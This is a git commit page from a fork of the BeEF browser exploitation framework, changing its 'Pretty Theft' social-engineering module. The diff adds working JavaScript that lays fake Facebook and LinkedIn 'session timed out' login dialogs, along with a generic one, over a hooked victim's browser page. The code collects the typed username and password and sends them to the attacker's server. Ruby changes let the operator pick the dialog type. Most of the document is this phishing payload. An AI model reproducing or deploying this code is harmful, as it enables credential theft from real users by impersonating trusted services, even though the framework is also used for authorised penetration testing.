Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added Facebook and Linkedin popups, also some code/logic improvements

Browse Source
This commit is contained in:
pwndizzle
2012-09-22 18:38:09 +08:00
parent fe87d382db
commit 483683ca78
3 changed files with 123 additions and 30 deletions
Download Patch File Download Diff File Expand all files Collapse all files

143
modules/social_engineering/pretty_theft/command.js
View File

@@ -50,16 +50,18 @@ beef.execute(function() {
} }
if (vis) { if (vis) {
// Calculate the page width and height // Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) { //if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px'; // var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px'; // var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) { //} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px'; // var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px'; // var pageHeight = document.body.offsetHeight+'px';
} else { //} else {
// Previous lines were not rendering page background correctly
var pageWidth='100%'; var pageWidth='100%';
var pageHeight='100%'; var pageHeight='100%';
} //}
//set the shader to cover the entire page and make it visible. //set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque; dark.style.opacity=opaque;
dark.style.MozOpacity=opaque; dark.style.MozOpacity=opaque;
@@ -74,46 +76,133 @@ beef.execute(function() {
} }
} }
// function to send response // CURRENTLY NOT USED
// Send done prompt to user
function win(){ function win(){
document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>'; document.getElementById('popup').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
answer = document.getElementById('uname').value+':'+document.getElementById('pass').value; answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
} }
// perform darkening
grayOut(true);
// Check whether the user has entered a user/pass and pressed ok
function checker(){ function checker(){
processval = document.body.lastChild.getElementsByTagName("input")[2].value; uname1 = document.body.lastChild.getElementsByTagName("input")[0].value;
if (processval == "Processing..") { pass1 = document.body.lastChild.getElementsByTagName("input")[1].value;
uname = document.body.lastChild.getElementsByTagName("input")[0].value; valcheck = document.body.lastChild.getElementsByTagName("input")[3].value;
pass = document.body.lastChild.getElementsByTagName("input")[1].value;
answer = uname+":"+pass if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") {
// Join user/pass and send to attacker
answer = uname1+":"+pass1
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
// set lastchild invisible // Set lastchild invisible
document.body.lastChild.setAttribute('style','display:none'); document.body.lastChild.setAttribute('style','display:none');
// lighten screen
grayOut(false);
clearInterval(credgrabber); clearInterval(credgrabber);
$j('#hax').remove(); // Lighten screen
grayOut(false);
$j('#popup').remove();
$j('#darkenScreenObject').remove(); $j('#darkenScreenObject').remove();
}else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){
// If user has not entered any data reset button
document.body.lastChild.getElementsByTagName("input")[3].value = "false";
alert("Please enter a valid username and password.");
} }
} }
// floating div // Facebook floating div
function writeit() { function facebook() {
sneakydiv = document.createElement('div'); sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'hax'); sneakydiv.setAttribute('id', 'popup');
sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
document.body.appendChild(sneakydiv);
// Set appearance using styles, maybe cleaner way to do this with CSS block?
var windowborder = 'style="width:330px;background:white;border:10px #999999 solid;border-radius:8px"';
var windowmain = 'style="border:1px #555 solid;"';
var tbarstyle = 'style="color: rgb(255, 255, 255); background-color: rgb(109, 132, 180);font-size: 13px;font-family:tahoma,verdana,arial,sans-serif;font-weight: bold;padding: 5px;padding-left:8px;text-align: left;height: 18px;"';
var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
var messagestyle = 'style="align:left;font-size:11px;font-family:tahoma,verdana,arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
var box_prestyle = 'style="color: grey;font-size: 11px;font-weight: bold;font-family: tahoma,verdana,arial,sans-serif;padding-left:30px;"';
var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color: rgb(109,132,180);"';
var buttonstyle = 'style="font-size: 13px;background:#627aac;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
var title = 'Facebook Session Timed Out';
var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
var buttonLabel = '<input type="button" name="ok" value="Log in" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
// Build page including styles
sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Email: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
// Repeatedly check if button has been pressed
credgrabber = setInterval(checker,1000);
}
// Linkedin floating div
function linkedin() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'popup');
sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
document.body.appendChild(sneakydiv);
// Set appearance using styles, maybe cleaner way to do this with CSS block?
var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"';
var windowmain = 'style="border:1px #555 solid;"';
var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"';
//-moz-box-shadow: 0 1px 4px #ccc;-webkit-box-shadow: 0 1px 4px #CCC;-o-box-shadow: 0 1px 4px #ccc;box-shadow: 0 1px 4px #CCC;
var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"';
var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"';
var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
var lilogo = 'http://press.linkedin.com/sites/all/themes/presslinkedin/images/LinkedIn_Logo_Web_Reverse_Trans2.png';
var title = 'Session Timed Out <img src="' + lilogo + '" align=right height=20 width=70 alt="LinkedIn">';
var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
// Build page including styles
sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Email: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
// Repeatedly check if button has been pressed
credgrabber = setInterval(checker,1000);
}
// Generic floating div with image
function generic() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'popup');
sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:20%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
sneakydiv.setAttribute('align', 'center'); sneakydiv.setAttribute('align', 'center');
document.body.appendChild(sneakydiv); document.body.appendChild(sneakydiv);
sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>'; sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"buttonpress\").value=\"true\";\' value=\'Ok\'><br/><input type="hidden" id="buttonpress" name="buttonpress" value="false"/>';
// Repeatedly check if button has been pressed
credgrabber = setInterval(checker,1000); credgrabber = setInterval(checker,1000);
} }
writeit(); // Set background opacity and apply background
var backcolor = "<%== @backing %>";
if(backcolor == "Grey"){
grayOut(true,{'opacity':'70'});
}else if(backcolor == "Clear"){
grayOut(true,{'opacity':'0'});
}
// Retrieve the chosen div option from Beef and display
var choice = "<%= @choice %>";
if(choice == "Facebook"){
facebook();
} else if(choice == "LinkedIn"){
linkedin();
} else{
generic();
}
}); });

4
modules/social_engineering/pretty_theft/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true enable: true
category: "Social Engineering" category: "Social Engineering"
name: "Pretty Theft" name: "Pretty Theft"
description: "Asks the user for their username and password using a tidy floating div." description: "Asks the user for their username and password using a floating div."
authors: ["vt [nick.freeman@security-assessment.com]", "xntrik"] authors: ["pwndizzle", "vt [nick.freeman@security-assessment.com]", "xntrik"]
target: target:
user_notify: ['ALL'] user_notify: ['ALL']

6
modules/social_engineering/pretty_theft/module.rb
View File

@@ -19,7 +19,11 @@ class Pretty_theft < BeEF::Core::Command
configuration = BeEF::Core::Configuration.instance configuration = BeEF::Core::Configuration.instance
logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png" logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
return [ return [
{'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo', 'value' => logo_uri} {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
{'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },
{'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo (Generic only)', 'value' => logo_uri}
] ]
end end